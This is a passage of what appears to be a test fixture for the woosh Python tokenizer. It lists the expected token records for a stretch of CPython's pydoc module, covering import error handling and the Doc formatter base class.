woosh.Token(woosh.NEWLINE, '\r\n', 439, 31, 440, 0),
woosh.Token(woosh.COMMENT, '# An error occurred while executing the imported module.', 440, 12, 440, 68),
woosh.Token(woosh.INDENT, ' ', 441, 0, 441, 12),
woosh.Token(woosh.NAME, 'raise', 441, 12, 441, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 441, 18, 441, 35),
woosh.Token(woosh.OP, '(', 441, 35, 441, 36),
woosh.Token(woosh.NAME, 'sys', 441, 36, 441, 39),
woosh.Token(woosh.OP, '.', 441, 39, 441, 40),
woosh.Token(woosh.NAME, 'modules', 441, 40, 441, 47),
woosh.Token(woosh.OP, '[', 441, 47, 441, 48),
woosh.Token(woosh.NAME, 'path', 441, 48, 441, 52),
woosh.Token(woosh.OP, ']', 441, 52, 441, 53),
woosh.Token(woosh.OP, '.', 441, 53, 441, 54),
woosh.Token(woosh.NAME, '__file__', 441, 54, 441, 62),
woosh.Token(woosh.OP, ',', 441, 62, 441, 63),
woosh.Token(woosh.NAME, 'info', 441, 64, 441, 68),
woosh.Token(woosh.OP, ')', 441, 68, 441, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 441, 69, 442, 0),
woosh.Token(woosh.DEDENT, ' ', 442, 0, 442, 8),
woosh.Token(woosh.NAME, 'elif', 442, 8, 442, 12),
woosh.Token(woosh.NAME, 'exc', 442, 13, 442, 16),
woosh.Token(woosh.NAME, 'is', 442, 17, 442, 19),
woosh.Token(woosh.NAME, 'SyntaxError', 442, 20, 442, 31),
woosh.Token(woosh.OP, ':', 442, 31, 442, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 442, 32, 443, 0),
woosh.Token(woosh.COMMENT, '# A SyntaxError occurred before we could execute the module.', 443, 12, 443, 72),
woosh.Token(woosh.INDENT, ' ', 444, 0, 444, 12),
woosh.Token(woosh.NAME, 'raise', 444, 12, 444, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 444, 18, 444, 35),
woosh.Token(woosh.OP, '(', 444, 35, 444, 36),
woosh.Token(woosh.NAME, 'value', 444, 36, 444, 41),
woosh.Token(woosh.OP, '.', 444, 41, 444, 42),
woosh.Token(woosh.NAME, 'filename', 444, 42, 444, 50),
woosh.Token(woosh.OP, ',', 444, 50, 444, 51),
woosh.Token(woosh.NAME, 'info', 444, 52, 444, 56),
woosh.Token(woosh.OP, ')', 444, 56, 444, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 444, 57, 445, 0),
woosh.Token(woosh.DEDENT, ' ', 445, 0, 445, 8),
woosh.Token(woosh.NAME, 'elif', 445, 8, 445, 12),
woosh.Token(woosh.NAME, 'issubclass', 445, 13, 445, 23),
woosh.Token(woosh.OP, '(', 445, 23, 445, 24),
woosh.Token(woosh.NAME, 'exc', 445, 24, 445, 27),
woosh.Token(woosh.OP, ',', 445, 27, 445, 28),
woosh.Token(woosh.NAME, 'ImportError', 445, 29, 445, 40),
woosh.Token(woosh.OP, ')', 445, 40, 445, 41),
woosh.Token(woosh.NAME, 'and', 445, 42, 445, 45),
woosh.Token(woosh.NAME, 'value', 445, 46, 445, 51),
woosh.Token(woosh.OP, '.', 445, 51, 445, 52),
woosh.Token(woosh.NAME, 'name', 445, 52, 445, 56),
woosh.Token(woosh.OP, '==', 445, 57, 445, 59),
woosh.Token(woosh.NAME, 'path', 445, 60, 445, 64),
woosh.Token(woosh.OP, ':', 445, 64, 445, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 445, 65, 446, 0),
woosh.Token(woosh.COMMENT, '# No such module in the path.', 446, 12, 446, 41),
woosh.Token(woosh.INDENT, ' ', 447, 0, 447, 12),
woosh.Token(woosh.NAME, 'return', 447, 12, 447, 18),
woosh.Token(woosh.NAME, 'None', 447, 19, 447, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 447, 23, 448, 0),
woosh.Token(woosh.DEDENT, ' ', 448, 0, 448, 8),
woosh.Token(woosh.NAME, 'else', 448, 8, 448, 12),
woosh.Token(woosh.OP, ':', 448, 12, 448, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 448, 13, 449, 0),
woosh.Token(woosh.COMMENT, '# Some other error occurred during the importing process.', 449, 12, 449, 69),
woosh.Token(woosh.INDENT, ' ', 450, 0, 450, 12),
woosh.Token(woosh.NAME, 'raise', 450, 12, 450, 17),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 450, 18, 450, 35),
woosh.Token(woosh.OP, '(', 450, 35, 450, 36),
woosh.Token(woosh.NAME, 'path', 450, 36, 450, 40),
woosh.Token(woosh.OP, ',', 450, 40, 450, 41),
woosh.Token(woosh.NAME, 'sys', 450, 42, 450, 45),
woosh.Token(woosh.OP, '.', 450, 45, 450, 46),
woosh.Token(woosh.NAME, 'exc_info', 450, 46, 450, 54),
woosh.Token(woosh.OP, '(', 450, 54, 450, 55),
woosh.Token(woosh.OP, ')', 450, 55, 450, 56),
woosh.Token(woosh.OP, ')', 450, 56, 450, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 450, 57, 451, 0),
woosh.Token(woosh.DEDENT, ' ', 451, 0, 451, 4),
woosh.Token(woosh.DEDENT, '', 451, 4, 451, 4),
woosh.Token(woosh.NAME, 'for', 451, 4, 451, 7),
woosh.Token(woosh.NAME, 'part', 451, 8, 451, 12),
woosh.Token(woosh.NAME, 'in', 451, 13, 451, 15),
woosh.Token(woosh.NAME, 'path', 451, 16, 451, 20),
woosh.Token(woosh.OP, '.', 451, 20, 451, 21),
woosh.Token(woosh.NAME, 'split', 451, 21, 451, 26),
woosh.Token(woosh.OP, '(', 451, 26, 451, 27),
woosh.Token(woosh.STRING, "'.'", 451, 27, 451, 30),
woosh.Token(woosh.OP, ')', 451, 30, 451, 31),
woosh.Token(woosh.OP, '[', 451, 31, 451, 32),
woosh.Token(woosh.NUMBER, '1', 451, 32, 451, 33),
woosh.Token(woosh.OP, ':', 451, 33, 451, 34),
woosh.Token(woosh.OP, ']', 451, 34, 451, 35),
woosh.Token(woosh.OP, ':', 451, 35, 451, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 451, 36, 452, 0),
woosh.Token(woosh.INDENT, ' ', 452, 0, 452, 8),
woosh.Token(woosh.NAME, 'try', 452, 8, 452, 11),
woosh.Token(woosh.OP, ':', 452, 11, 452, 12),
woosh.Token(woosh.NAME, 'module', 452, 13, 452, 19),
woosh.Token(woosh.OP, '=', 452, 20, 452, 21),
woosh.Token(woosh.NAME, 'getattr', 452, 22, 452, 29),
woosh.Token(woosh.OP, '(', 452, 29, 452, 30),
woosh.Token(woosh.NAME, 'module', 452, 30, 452, 36),
woosh.Token(woosh.OP, ',', 452, 36, 452, 37),
woosh.Token(woosh.NAME, 'part', 452, 38, 452, 42),
woosh.Token(woosh.OP, ')', 452, 42, 452, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 452, 43, 453, 0),
woosh.Token(woosh.NAME, 'except', 453, 8, 453, 14),
woosh.Token(woosh.NAME, 'AttributeError', 453, 15, 453, 29),
woosh.Token(woosh.OP, ':', 453, 29, 453, 30),
woosh.Token(woosh.NAME, 'return', 453, 31, 453, 37),
woosh.Token(woosh.NAME, 'None', 453, 38, 453, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 453, 42, 454, 0),
woosh.Token(woosh.DEDENT, ' ', 454, 0, 454, 4),
woosh.Token(woosh.NAME, 'return', 454, 4, 454, 10),
woosh.Token(woosh.NAME, 'module', 454, 11, 454, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 454, 17, 455, 0),
woosh.Token(woosh.COMMENT, '# ---------------------------------------------------- formatter base class', 456, 0, 456, 75),
woosh.Token(woosh.DEDENT, '', 458, 0, 458, 0),
woosh.Token(woosh.NAME, 'class', 458, 0, 458, 5),
woosh.Token(woosh.NAME, 'Doc', 458, 6, 458, 9),
woosh.Token(woosh.OP, ':', 458, 9, 458, 10),
woosh.Token(woosh.NEWLINE, '\r\n', 458, 10, 459, 0),
woosh.Token(woosh.INDENT, ' ', 460, 0, 460, 4),
woosh.Token(woosh.NAME, 'PYTHONDOCS', 460, 4, 460, 14),
woosh.Token(woosh.OP, '=', 460, 15, 460, 16),
woosh.Token(woosh.NAME, 'os', 460, 17, 460, 19),
woosh.Token(woosh.OP, '.', 460, 19, 460, 20),
woosh.Token(woosh.NAME, 'environ', 460, 20, 460, 27),
woosh.Token(woosh.OP, '.', 460, 27, 460, 28),
woosh.Token(woosh.NAME, 'get', 460, 28, 460, 31),
woosh.Token(woosh.OP, '(', 460, 31, 460, 32),
woosh.Token(woosh.STRING, '"PYTHONDOCS"', 460, 32, 460, 44),
woosh.Token(woosh.OP, ',', 460, 44, 460, 45),
woosh.Token(woosh.STRING, '"https://docs.python.org/%d.%d/library"', 461, 32, 461, 71),
woosh.Token(woosh.OP, '%', 462, 32, 462, 33),
woosh.Token(woosh.NAME, 'sys', 462, 34, 462, 37),
woosh.Token(woosh.OP, '.', 462, 37, 462, 38),
woosh.Token(woosh.NAME, 'version_info', 462, 38, 462, 50),
woosh.Token(woosh.OP, '[', 462, 50, 462, 51),
woosh.Token(woosh.OP, ':', 462, 51, 462, 52),
woosh.Token(woosh.NUMBER, '2', 462, 52, 462, 53),
woosh.Token(woosh.OP, ']', 462, 53, 462, 54),
woosh.Token(woosh.OP, ')', 462, 54, 462, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 462, 55, 463, 0),
woosh.Token(woosh.NAME, 'def', 464, 4, 464, 7),
woosh.Token(woosh.NAME, 'document', 464, 8, 464, 16),
woosh.Token(woosh.OP, '(', 464, 16, 464, 17),
woosh.Token(woosh.NAME, 'self', 464, 17, 464, 21),
woosh.Token(woosh.OP, ',', 464, 21, 464, 22),
woosh.Token(woosh.NAME, 'object', 464, 23, 464, 29),
woosh.Token(woosh.OP, ',', 464, 29, 464, 30),
woosh.Token(woosh.NAME, 'name', 464, 31, 464, 35),
woosh.Token(woosh.OP, '=', 464, 35, 464, 36),
woosh.Token(woosh.NAME, 'None', 464, 36, 464, 40),
woosh.Token(woosh.OP, ',', 464, 40, 464, 41),
woosh.Token(woosh.OP, '*', 464, 42, 464, 43),
woosh.Token(woosh.NAME, 'args', 464, 43, 464, 47),
woosh.Token(woosh.OP, ')', 464, 47, 464, 48),
woosh.Token(woosh.OP, ':', 464, 48, 464, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 464, 49, 465, 0),
woosh.Token(woosh.INDENT, ' ', 465, 0, 465, 8),
woosh.Token(woosh.STRING, '"""Generate documentation for an object."""', 465, 8, 465, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 465, 51, 466, 0),
woosh.Token(woosh.NAME, 'args', 466, 8, 466, 12),
woosh.Token(woosh.OP, '=', 466, 13, 466, 14),
woosh.Token(woosh.OP, '(', 466, 15, 466, 16),
woosh.Token(woosh.NAME, 'object', 466, 16, 466, 22),
woosh.Token(woosh.OP, ',', 466, 22, 466, 23),
woosh.Token(woosh.NAME, 'name', 466, 24, 466, 28),
woosh.Token(woosh.OP, ')', 466, 28, 466, 29),
woosh.Token(woosh.OP, '+', 466, 30, 466, 31),
woosh.Token(woosh.NAME, 'args', 466, 32, 466, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 466, 36, 467, 0),
woosh.Token(woosh.COMMENT, "# 'try' clause is to attempt to handle the possibility that inspect", 467, 8, 467, 75),
woosh.Token(woosh.COMMENT, '# identifies something in a way that pydoc itself has issues handling;', 468, 8, 468, 78),
woosh.Token(woosh.COMMENT, "# think 'super' and how it is a descriptor (which raises the exception", 469, 8, 469, 78),
woosh.Token(woosh.COMMENT, '# by lacking a __name__ attribute) and an instance.', 470, 8, 470, 59),
woosh.Token(woosh.NAME, 'try', 471, 8, 471, 11),
woosh.Token(woosh.OP, ':', 471, 11, 471, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 471, 12, 472, 0),
woosh.Token(woosh.INDENT, ' ', 472, 0, 472, 12),
woosh.Token(woosh.NAME, 'if', 472, 12, 472, 14),
woosh.Token(woosh.NAME, 'inspect', 472, 15, 472, 22),
woosh.Token(woosh.OP, '.', 472, 22, 472, 23),
woosh.Token(woosh.NAME, 'ismodule', 472, 23, 472, 31),
woosh.Token(woosh.OP, '(', 472, 31, 472, 32),
woosh.Token(woosh.NAME, 'object', 472, 32, 472, 38),
woosh.Token(woosh.OP, ')', 472, 38, 472, 39),
woosh.Token(woosh.OP, ':', 472, 39, 472, 40),
woosh.Token(woosh.NAME, 'return', 472, 41, 472, 47),
woosh.Token(woosh.NAME, 'self', 472, 48, 472, 52),
woosh.Token(woosh.OP, '.', 472, 52, 472, 53),
woosh.Token(woosh.NAME, 'docmodule', 472, 53, 472, 62),
woosh.Token(woosh.OP, '(', 472, 62, 472, 63),
woosh.Token(woosh.OP, '*', 472, 63, 472, 64),
woosh.Token(woosh.NAME, 'args', 472, 64, 472, 68),
woosh.Token(woosh.OP, ')', 472, 68, 472, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 472, 69, 473, 0),
woosh.Token(woosh.NAME, 'if', 473, 12, 473, 14),
woosh.Token(woosh.NAME, 'inspect', 473, 15, 473, 22),
woosh.Token(woosh.OP, '.', 473, 22, 473, 23),
woosh.Token(woosh.NAME, 'isclass', 473, 23, 473, 30),
woosh.Token(woosh.OP, '(', 473, 30, 473, 31),
woosh.Token(woosh.NAME, 'object', 473, 31, 473, 37),
woosh.Token(woosh.OP, ')', 473, 37, 473, 38),
woosh.Token(woosh.OP, ':', 473, 38, 473, 39),
woosh.Token(woosh.NAME, 'return', 473, 40, 473, 46),
woosh.Token(woosh.NAME, 'self', 473, 47, 473, 51),
woosh.Token(woosh.OP, '.', 473, 51, 473, 52),
woosh.Token(woosh.NAME, 'docclass', 473, 52, 473, 60),
woosh.Token(woosh.OP, '(', 473, 60, 473, 61),
woosh.Token(woosh.OP, '*', 473, 61, 473, 62),
woosh.Token(woosh.NAME, 'args', 473, 62, 473, 66),
woosh.Token(woosh.OP, ')', 473, 66, 473, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 473, 67, 474, 0),
woosh.Token(woosh.NAME, 'if', 474, 12, 474, 14),
woosh.Token(woosh.NAME, 'inspect', 474, 15, 474, 22),
woosh.Token(woosh.OP, '.', 474, 22, 474, 23),
woosh.Token(woosh.NAME, 'isroutine', 474, 23, 474, 32),
woosh.Token(woosh.OP, '(', 474, 32, 474, 33),
woosh.Token(woosh.NAME, 'object', 474, 33, 474, 39),
woosh.Token(woosh.OP, ')', 474, 39, 474, 40),
woosh.Token(woosh.OP, ':', 474, 40, 474, 41),
woosh.Token(woosh.NAME, 'return', 474, 42, 474, 48),
woosh.Token(woosh.NAME, 'self', 474, 49, 474, 53),
woosh.Token(woosh.OP, '.', 474, 53, 474, 54),
woosh.Token(woosh.NAME, 'docroutine', 474, 54, 474, 64),
woosh.Token(woosh.OP, '(', 474, 64, 474, 65),
woosh.Token(woosh.OP, '*', 474, 65, 474, 66),
woosh.Token(woosh.NAME, 'args', 474, 66, 474, 70),
woosh.Token(woosh.OP, ')', 474, 70, 474, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 474, 71, 475, 0),
woosh.Token(woosh.DEDENT, ' ', 475, 0, 475, 8),
woosh.Token(woosh.NAME, 'except', 475, 8, 475, 14),
woosh.Token(woosh.NAME, 'AttributeError', 475, 15, 475, 29),
woosh.Token(woosh.OP, ':', 475, 29, 475, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 475, 30, 476, 0),
woosh.Token(woosh.INDENT, ' ', 476, 0, 476, 12),
woosh.Token(woosh.NAME, 'pass', 476, 12, 476, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 476, 16, 477, 0),
woosh.Token(woosh.DEDENT, ' ', 477, 0, 477, 8),
woosh.Token(woosh.NAME, 'if', 477, 8, 477, 10),
woosh.Token(woosh.NAME, 'inspect', 477, 11, 477, 18),
woosh.Token(woosh.OP, '.', 477, 18, 477, 19),
woosh.Token(woosh.NAME, 'isdatadescriptor', 477, 19, 477, 35),
woosh.Token(woosh.OP, '(', 477, 35, 477, 36),
woosh.Token(woosh.NAME, 'object', 477, 36, 477, 42),
woosh.Token(woosh.OP, ')', 477, 42, 477, 43),
woosh.Token(woosh.OP, ':', 477, 43, 477, 44),
woosh.Token(woosh.NAME, 'return', 477, 45, 477, 51),
woosh.Token(woosh.NAME, 'self', 477, 52, 477, 56),
woosh.Token(woosh.OP, '.', 477, 56, 477, 57),
woosh.Token(woosh.NAME, 'docdata', 477, 57, 477, 64),
woosh.Token(woosh.OP, '(', 477, 64, 477, 65),
woosh.Token(woosh.OP, '*', 477, 65, 477, 66),
woosh.Token(woosh.NAME, 'args', 477, 66, 477, 70),
woosh.Token(woosh.OP, ')', 477, 70, 477, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 477, 71, 478, 0),
woosh.Token(woosh.NAME, 'return', 478, 8, 478, 14),
woosh.Token(woosh.NAME, 'self', 478, 15, 478, 19),
woosh.Token(woosh.OP, '.', 478, 19, 478, 20),
woosh.Token(woosh.NAME, 'docother', 478, 20, 478, 28),
woosh.Token(woosh.OP, '(', 478, 28, 478, 29),
woosh.Token(woosh.OP, '*', 478, 29, 478, 30),
woosh.Token(woosh.NAME, 'args', 478, 30, 478, 34),
woosh.Token(woosh.OP, ')', 478, 34, 478, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 478, 35, 479, 0),
woosh.Token(woosh.DEDENT, ' ', 480, 0, 480, 4),
woosh.Token(woosh.NAME, 'def', 480, 4, 480, 7),
woosh.Token(woosh.NAME, 'fail', 480, 8, 480, 12),
woosh.Token(woosh.OP, '(', 480, 12, 480, 13),
woosh.Token(woosh.NAME, 'self', 480, 13, 480, 17),
woosh.Token(woosh.OP, ',', 480, 17, 480, 18),
woosh.Token(woosh.NAME, 'object', 480, 19, 480, 25),
woosh.Token(woosh.OP, ',', 480, 25, 480, 26),
woosh.Token(woosh.NAME, 'name', 480, 27, 480, 31),
woosh.Token(woosh.OP, '=', 480, 31, 480, 32),
woosh.Token(woosh.NAME, 'None', 480, 32, 480, 36),
woosh.Token(woosh.OP, ',', 480, 36, 480, 37),
woosh.Token(woosh.OP, '*', 480, 38, 480, 39),
woosh.Token(woosh.NAME, 'args', 480, 39, 480, 43),
woosh.Token(woosh.OP, ')', 480, 43, 480, 44),
woosh.Token(woosh.OP, ':', 480, 44, 480, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 480, 45, 481, 0),
woosh.Token(woosh.INDENT, ' ', 481, 0, 481, 8),
woosh.Token(woosh.STRING, '"""Raise an exception for unimplemented types."""', 481, 8, 481, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 481, 57, 482, 0),
woosh.Token(woosh.NAME, 'message', 482, 8, 482, 15),
woosh.Token(woosh.OP, '=', 482, 16, 482, 17),
woosh.Token(woosh.STRING, '"don\'t know how to document object%s of type %s"', 482, 18, 482, 66),
woosh.Token(woosh.OP, '%', 482, 67, 482, 68),
woosh.Token(woosh.OP, '(', 482, 69, 482, 70),
woosh.Token(woosh.NAME, 'name', 483, 12, 483, 16),
woosh.Token(woosh.NAME, 'and', 483, 17, 483, 20),
woosh.Token(woosh.STRING, "' '", 483, 21, 483, 24),
woosh.Token(woosh.OP, '+', 483, 25, 483, 26),
woosh.Token(woosh.NAME, 'repr', 483, 27, 483, 31),
woosh.Token(woosh.OP, '(', 483, 31, 483, 32),
woosh.Token(woosh.NAME, 'name', 483, 32, 483, 36),
woosh.Token(woosh.OP, ')', 483, 36, 483, 37),
woosh.Token(woosh.OP, ',', 483, 37, 483, 38),
woosh.Token(woosh.NAME, 'type', 483, 39, 483, 43),
woosh.Token(woosh.OP, '(', 483, 43, 483, 44),
woosh.Token(woosh.NAME, 'object', 483, 44, 483, 50),
woosh.Token(woosh.OP, ')', 483, 50, 483, 51),
woosh.Token(woosh.OP, '.', 483, 51, 483, 52),
woosh.Token(woosh.NAME, '__name__', 483, 52, 483, 60),
woosh.Token(woosh.OP, ')', 483, 60, 483, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 483, 61, 484, 0),
woosh.Token(woosh.NAME, 'raise', 484, 8, 484, 13),
woosh.Token(woosh.NAME, 'TypeError', 484, 14, 484, 23),
woosh.Token(woosh.OP, '(', 484, 23, 484, 24),
woosh.Token(woosh.NAME, 'message', 484, 24, 484, 31),
woosh.Token(woosh.OP, ')', 484, 31, 484, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 484, 32, 485, 0),
woosh.Token(woosh.DEDENT, ' ', 486, 0, 486, 4),
woosh.Token(woosh.NAME, 'docmodule', 486, 4, 486, 13),
woosh.Token(woosh.OP, '=', 486, 14, 486, 15),
woosh.Token(woosh.NAME, 'docclass', 486, 16, 486, 24),
woosh.Token(woosh.OP, '=', 486, 25, 486, 26),
woosh.Token(woosh.NAME, 'docroutine', 486, 27, 486, 37),
woosh.Token(woosh.OP, '=', 486, 38, 486, 39),
woosh.Token(woosh.NAME, 'docother', 486, 40, 486, 48),
woosh.Token(woosh.OP, '=', 486, 49, 486, 50),
woosh.Token(woosh.NAME, 'docproperty', 486, 51, 486, 62),
woosh.Token(woosh.OP, '=', 486, 63, 486, 64),
woosh.Token(woosh.NAME, 'docdata', 486, 65, 486, 72),
woosh.Token(woosh.OP, '=', 486, 73, 486, 74),
woosh.Token(woosh.NAME, 'fail', 486, 75, 486, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 486, 79, 487, 0),
woosh.Token(woosh.NAME, 'def', 488, 4, 488, 7),
woosh.Token(woosh.NAME, 'getdocloc', 488, 8, 488, 17),
woosh.Token(woosh.OP, '(', 488, 17, 488, 18),
woosh.Token(woosh.NAME, 'self', 488, 18, 488, 22),
woosh.Token(woosh.OP, ',', 488, 22, 488, 23),
woosh.Token(woosh.NAME, 'object', 488, 24, 488, 30),
woosh.Token(woosh.OP, ',', 488, 30, 488, 31),
woosh.Token(woosh.NAME, 'basedir', 488, 32, 488, 39),
woosh.Token(woosh.OP, '=', 488, 39, 488, 40),
woosh.Token(woosh.NAME, 'sysconfig', 488, 40, 488, 49),
woosh.Token(woosh.OP, '.', 488, 49, 488, 50),
woosh.Token(woosh.NAME, 'get_path', 488, 50, 488, 58),
woosh.Token(woosh.OP, '(', 488, 58, 488, 59),
woosh.Token(woosh.STRING, "'stdlib'", 488, 59, 488, 67),
woosh.Token(woosh.OP, ')', 488, 67, 488, 68),
woosh.Token(woosh.OP, ')', 488, 68, 488, 69),
woosh.Token(woosh.OP, ':', 488, 69, 488, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 488, 70, 489, 0),
woosh.Token(woosh.INDENT, ' ', 489, 0, 489, 8),
woosh.Token(woosh.STRING, '"""Return the location of module docs or None"""', 489, 8, 489, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 489, 56, 490, 0),
woosh.Token(woosh.NAME, 'try', 491, 8, 491, 11),
woosh.Token(woosh.OP, ':', 491, 11, 491, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 491, 12, 492, 0),
woosh.Token(woosh.INDENT, ' ', 492, 0, 492, 12),
woosh.Token(woosh.NAME, 'file', 492, 12, 492, 16),
woosh.Token(woosh.OP, '=', 492, 17, 492, 18),
woosh.Token(woosh.NAME, 'inspect', 492, 19, 492, 26),
woosh.Token(woosh.OP, '.', 492, 26, 492, 27),
woosh.Token(woosh.NAME, 'getabsfile', 492, 27, 492, 37),
woosh.Token(woosh.OP, '(', 492, 37, 492, 38),
woosh.Token(woosh.NAME, 'object', 492, 38, 492, 44),
woosh.Token(woosh.OP, ')', 492, 44, 492, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 492, 45, 493, 0),
woosh.Token(woosh.DEDENT, ' ', 493, 0, 493, 8),
woosh.Token(woosh.NAME, 'except', 493, 8, 493, 14),
woosh.Token(woosh.NAME, 'TypeError', 493, 15, 493, 24),
woosh.Token(woosh.OP, ':', 493, 24, 493, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 493, 25, 494, 0),
woosh.Token(woosh.INDENT, ' ', 494, 0, 494, 12),
woosh.Token(woosh.NAME, 'file', 494, 12, 494, 16),
woosh.Token(woosh.OP, '=', 494, 17, 494, 18),
woosh.Token(woosh.STRING, "'(built-in)'", 494, 19, 494, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 494, 31, 495, 0),
woosh.Token(woosh.DEDENT, ' ', 496, 0, 496, 8),
woosh.Token(woosh.NAME, 'docloc', 496, 8, 496, 14),
woosh.Token(woosh.OP, '=', 496, 15, 496, 16),
woosh.Token(woosh.NAME, 'os', 496, 17, 496, 19),
woosh.Token(woosh.OP, '.', 496, 19, 496, 20),
woosh.Token(woosh.NAME, 'environ', 496, 20, 496, 27),
woosh.Token(woosh.OP, '.', 496, 27, 496, 28),
woosh.Token(woosh.NAME, 'get', 496, 28, 496, 31),
woosh.Token(woosh.OP, '(', 496, 31, 496, 32),
woosh.Token(woosh.STRING, '"PYTHONDOCS"', 496, 32, 496, 44),
woosh.Token(woosh.OP, ',', 496, 44, 496, 45),
woosh.Token(woosh.NAME, 'self', 496, 46, 496, 50),
woosh.Token(woosh.OP, '.', 496, 50, 496, 51),
woosh.Token(woosh.NAME, 'PYTHONDOCS', 496, 51, 496, 61),
woosh.Token(woosh.OP, ')', 496, 61, 496, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 496, 62, 497, 0),
woosh.Token(woosh.NAME, 'basedir', 498, 8, 498, 15),
woosh.Token(woosh.OP, '=', 498, 16, 498, 17),
woosh.Token(woosh.NAME, 'os', 498, 18, 498, 20),
woosh.Token(woosh.OP, '.', 498, 20, 498, 21),
woosh.Token(woosh.NAME, 'path', 498, 21, 498, 25),
woosh.Token(woosh.OP, '.', 498, 25, 498, 26),
woosh.Token(woosh.NAME, 'normcase', 498, 26, 498, 34),
woosh.Token(woosh.OP, '(', 498, 34, 498, 35),
woosh.Token(woosh.NAME, 'basedir', 498, 35, 498, 42),
woosh.Token(woosh.OP, ')', 498, 42, 498, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 498, 43, 499, 0),
woosh.Token(woosh.NAME, 'if', 499, 8, 499, 10),
woosh.Token(woosh.OP, '(', 499, 11, 499, 12),
woosh.Token(woosh.NAME, 'isinstance', 499, 12, 499, 22),
woosh.Token(woosh.OP, '(', 499, 22, 499, 23),
woosh.Token(woosh.NAME, 'object', 499, 23, 499, 29),
woosh.Token(woosh.OP, ',', 499, 29, 499, 30),
woosh.Token(woosh.NAME, 'type', 499, 31, 499, 35),
woosh.Token(woosh.OP, '(', 499, 35, 499, 36),
woosh.Token(woosh.NAME, 'os', 499, 36, 499, 38),
woosh.Token(woosh.OP, ')', 499, 38, 499, 39),
woosh.Token(woosh.OP, ')', 499, 39, 499, 40),
woosh.Token(woosh.NAME, 'and', 499, 41, 499, 44),
woosh.Token(woosh.OP, '(', 500, 12, 500, 13),
woosh.Token(woosh.NAME, 'object', 500, 13, 500, 19),
woosh.Token(woosh.OP, '.', 500, 19, 500, 20),
woosh.Token(woosh.NAME, '__name__', 500, 20, 500, 28),
woosh.Token(woosh.NAME, 'in', 500, 29, 500, 31),
woosh.Token(woosh.OP, '(', 500, 32, 500, 33),
woosh.Token(woosh.STRING, "'errno'", 500, 33, 500, 40),
woosh.Token(woosh.OP, ',', 500, 40, 500, 41),
woosh.Token(woosh.STRING, "'exceptions'", 500, 42, 500, 54),
woosh.Token(woosh.OP, ',', 500, 54, 500, 55),
woosh.Token(woosh.STRING, "'gc'", 500, 56, 500, 60),
woosh.Token(woosh.OP, ',', 500, 60, 500, 61),
woosh.Token(woosh.STRING, "'imp'", 500, 62, 500, 67),
woosh.Token(woosh.OP, ',', 500, 67, 500, 68),
woosh.Token(woosh.STRING, "'marshal'", 501, 33, 501, 42),
woosh.Token(woosh.OP, ',', 501, 42, 501, 43),
woosh.Token(woosh.STRING, "'posix'", 501, 44, 501, 51),
woosh.Token(woosh.OP, ',', 501, 51, 501, 52),
woosh.Token(woosh.STRING, "'signal'", 501, 53, 501, 61),
woosh.Token(woosh.OP, ',', 501, 61, 501, 62),
woosh.Token(woosh.STRING, "'sys'", 501, 63, 501, 68),
woosh.Token(woosh.OP, ',', 501, 68, 501, 69),
woosh.Token(woosh.STRING, "'_thread'", 502, 33, 502, 42),
woosh.Token(woosh.OP, ',', 502, 42, 502, 43),
woosh.Token(woosh.STRING, "'zipimport'", 502, 44, 502, 55),
woosh.Token(woosh.OP, ')', 502, 55, 502, 56),
woosh.Token(woosh.NAME, 'or', 502, 57, 502, 59),
woosh.Token(woosh.OP, '(', 503, 13, 503, 14),
woosh.Token(woosh.NAME, 'file', 503, 14, 503, 18),
woosh.Token(woosh.OP, '.', 503, 18, 503, 19),
woosh.Token(woosh.NAME, 'startswith', 503, 19, 503, 29),
woosh.Token(woosh.OP, '(', 503, 29, 503, 30),
woosh.Token(woosh.NAME, 'basedir', 503, 30, 503, 37),
woosh.Token(woosh.OP, ')', 503, 37, 503, 38),
woosh.Token(woosh.NAME, 'and', 503, 39, 503, 42),
woosh.Token(woosh.NAME, 'not', 504, 14, 504, 17),
woosh.Token(woosh.NAME, 'file', 504, 18, 504, 22),
woosh.Token(woosh.OP, '.', 504, 22, 504, 23),
woosh.Token(woosh.NAME, 'startswith', 504, 23, 504, 33),
woosh.Token(woosh.OP, '(', 504, 33, 504, 34),
woosh.Token(woosh.NAME, 'os', 504, 34, 504, 36),
woosh.Token(woosh.OP, '.', 504, 36, 504, 37),
woosh.Token(woosh.NAME, 'path', 504, 37, 504, 41),
woosh.Token(woosh.OP, '.', 504, 41, 504, 42),
woosh.Token(woosh.NAME, 'join', 504, 42, 504, 46),
woosh.Token(woosh.OP, '(', 504, 46, 504, 47),
